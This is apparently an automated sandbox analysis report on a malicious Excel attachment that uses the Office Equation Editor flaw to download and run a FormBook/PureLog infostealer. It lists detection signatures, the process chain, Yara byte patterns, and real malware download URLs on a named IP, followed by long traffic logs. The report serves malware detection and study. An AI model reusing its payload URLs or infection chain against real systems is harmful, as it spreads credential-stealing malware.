Windows Analysis Report
RFQ#51281AOLAI.xls

Overview

General Information

Sample name: RFQ#51281AOLAI.xls
Analysis ID: 1483000
MD5: cdf0aba5b4f9e4315f9dfbf906a5c4da
SHA1: 74056fd5b1e7456fd00014c677d7b85ef65c4a8a
SHA256: 048a0f6be28b03503cde3fecf918773e1dadbe0a50b24c7dc9fe430665bc0cbb
Tags: xls
Infos:

Detection

FormBook, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Microsoft Office launches external ms-search protocol handler (WebDAV)
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious Excel or Word document
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Microsoft Office drops suspicious files
Office drops RTF file
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Office viewer loads remote template
Sigma detected: Equation Editor Network Connection
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains Microsoft Equation 3.0 OLE entries
Document contains embedded VBA macros
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 1892 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • WINWORD.EXE (PID: 1012 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
      • EQNEDT32.EXE (PID: 1256 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • winiti.exe (PID: 3104 cmdline: "C:\Users\user\AppData\Roaming\winiti.exe" MD5: 1F5C95D40C06C01300F0A6592945A72D)
      • winiti.exe (PID: 3144 cmdline: "C:\Users\user\AppData\Roaming\winiti.exe" MD5: 1F5C95D40C06C01300F0A6592945A72D)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\recreatednewthingswithentrienewprocesswhichwedidwithouthavingsuchagereatthigstodoever_______greatthingstohappened[1].doc | INDICATOR_RTF_MalVer_Objects | Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. | ditekSHen
  • 0xf74:$obj2: \objdata
  • 0xf60:$obj3: \objupdate
  • 0xf3b:$obj6: \objlink
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FFE27256.doc | INDICATOR_RTF_MalVer_Objects | Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. | ditekSHen
  • 0xf74:$obj2: \objdata
  • 0xf60:$obj3: \objupdate
  • 0xf3b:$obj6: \objlink
Source | Rule | Description | Author | Strings
00000008.00000002.414747610.0000000000590000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
00000009.00000002.489032107.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000009.00000002.489032107.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2ec33:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x176e2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000009.00000002.488998294.0000000000150000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000009.00000002.488998294.0000000000150000.00000004.00001000.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2b9d0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x1447f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Source | Rule | Description | Author | Strings
8.2.winiti.exe.289505c.4.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
9.2.winiti.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
9.2.winiti.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2de33:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x168e2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
9.2.winiti.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
9.2.winiti.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2ec33:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x176e2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

              Exploits

              Source: Network Connection | Author: Joe Security | Data: DestinationIp: 104.219.239.104, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1256, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49166
              Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1256, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\winiti[1].exe

              System Summary

              Source: Network Connection | Author: Max Altgelt (Nextron Systems) | Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49166, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1256, Protocol: tcp, SourceIp: 104.219.239.104, SourceIsIpv6: false, SourcePort: 80
              Source: Process started | Author: Jason Lynch | Data: Command: "C:\Users\user\AppData\Roaming\winiti.exe" , CommandLine: "C:\Users\user\AppData\Roaming\winiti.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\winiti.exe, NewProcessName: C:\Users\user\AppData\Roaming\winiti.exe, OriginalFileName: C:\Users\user\AppData\Roaming\winiti.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1892, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\winiti.exe" , ProcessId: 3104, ProcessName: winiti.exe
              Source: Process started | Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io | Data: Command: "C:\Users\user\AppData\Roaming\winiti.exe" , CommandLine: "C:\Users\user\AppData\Roaming\winiti.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\winiti.exe, NewProcessName: C:\Users\user\AppData\Roaming\winiti.exe, OriginalFileName: C:\Users\user\AppData\Roaming\winiti.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1892, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\winiti.exe" , ProcessId: 3104, ProcessName: winiti.exe
              Source: Network Connection | Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton | Data: DestinationIp: 188.114.97.3, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 1892, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
              Source: Network Connection | Author: X__Junior (Nextron Systems) | Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 1892, Protocol: tcp, SourceIp: 188.114.97.3, SourceIsIpv6: false, SourcePort: 80
              Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 1892, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
              Source: File created | Author: Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 1012, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
              No Snort rule has matched
              Timestamp: 2024-07-26T13:40:28.015784+0200
              SID: 2022050
              Source Port: 80
              Destination Port: 49166
              Protocol: TCP
              Classtype: A Network Trojan was detected
              Timestamp: 2024-07-26T13:40:28.186759+0200
              SID: 2022051
              Source Port: 80
              Destination Port: 49166
              Protocol: TCP
              Classtype: A Network Trojan was detected

              AV Detection

              Source: http://104.219.239.104/xampp/bn/recreatednewthingswithentrienewprocesswhichwedidwithouthavingsuchagereatthigstodoever_______greatthingstohappened.doc | Avira URL Cloud: Label: malware
              Source: http://104.219.239.104/80/winiti.exe | Avira URL Cloud: Label: malware
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{0F8425F3-6468-4181-A134-C6330FCC02D5}.tmp | Avira: detection malicious, Label: EXP/CVE-2017-11882.Gen
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\recreatednewthingswithentrienewprocesswhichwedidwithouthavingsuchagereatthigstodoever_______greatthingstohappened[1].doc | Avira: detection malicious, Label: HEUR/Rtf.Malformed
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FFE27256.doc | Avira: detection malicious, Label: HEUR/Rtf.Malformed
              Source: Yara match | File source: 9.2.winiti.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 9.2.winiti.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000009.00000002.489032107.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000009.00000002.488998294.0000000000150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\winiti[1].exe | Joe Sandbox ML: detected
              Source: C:\Users\user\AppData\Roaming\winiti.exe | Joe Sandbox ML: detected
              Source: RFQ#51281AOLAI.xls | Joe Sandbox ML: detected

              Exploits

              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Network connect: IP: 104.219.239.104 Port: 80
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\winiti.exe
              Source: ~WRF{0F8425F3-6468-4181-A134-C6330FCC02D5}.tmp.3.dr | Stream path '_1783484778/\x1CompObj' : ...................F....Microsoft Equation 3.0....
              Source: ~WRF{0F8425F3-6468-4181-A134-C6330FCC02D5}.tmp.3.dr | Stream path '_1783484783/\x1CompObj' : ...................F....Microsoft Equation 3.0....
              Source: ~WRF{0F8425F3-6468-4181-A134-C6330FCC02D5}.tmp.3.dr | Stream path '_1783484802/\x1CompObj' : ...................F....Microsoft Equation 3.0....
              Source: ~WRF{0F8425F3-6468-4181-A134-C6330FCC02D5}.tmp.3.dr | Stream path '_1783484803/\x1CompObj' : ...................F....Microsoft Equation 3.0....
              Source: ~WRF{0F8425F3-6468-4181-A134-C6330FCC02D5}.tmp.3.dr | Stream path '_1783484806/\x1CompObj' : ...................F....Microsoft Equation 3.0....
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
              Source: Binary string: amWV.pdb source: winiti.exe, 00000008.00000000.412497282.0000000001382000.00000020.00000001.01000000.00000005.sdmp, winiti[1].exe.7.dr, winiti.exe.7.dr
              Source: Binary string: amWV.pdbSHA256 source: winiti.exe, 00000008.00000000.412497282.0000000001382000.00000020.00000001.01000000.00000005.sdmp, winiti[1].exe.7.dr, winiti.exe.7.dr
              Source: Binary string: wntdll.pdb source: winiti.exe, winiti.exe, 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp

              Software Vulnerabilities

              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
              Source: global traffic | DNS query: name: tny.wtf
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.219.239.104:80
